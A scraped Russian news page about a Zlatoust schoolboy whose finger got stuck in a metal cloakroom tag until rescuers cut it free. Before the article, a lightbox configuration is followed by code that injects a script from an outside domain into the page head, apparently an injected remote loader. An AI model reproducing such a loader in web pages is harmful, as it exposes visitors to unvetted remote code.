, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Освободить палец златоустовского школьника из плена металлической бирки удалось только после вмешательства спасателей

10-летний златоуствоский школьник в сопровождении старшей сестры пришел в детскую поликлинику на прием к врачу. В гардеробе взамен одежды ему выдали металлическую бирку. Именно из-за нее, а также по причине чрезмерного любопытства мальчика произошло ЧП. Бирка намертво застряла на пальце у мальчика.

Сначала школьник попытался освободиться от бирки самостоятельно, затем обратился за помощью к врачам. Палец все больше опухал, в то время как удалить металлический предмет с пальца не получалось. Тогда на помощь пришли златоустовские спасатели. С помощью шлифовальной машины они сделали на бирке надрез, а затем с помощью ножниц по металлу и другого инструмента освободили палец из плена. К счастью, конечность ребенка не пострадала. Распиленную пополам бирку школьнику вручили на память.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
16:11 - 23 марта 2014
|
автор: U-RSS
|
(393)
|
(0)

Комментарии (0)

Я человек
Я бот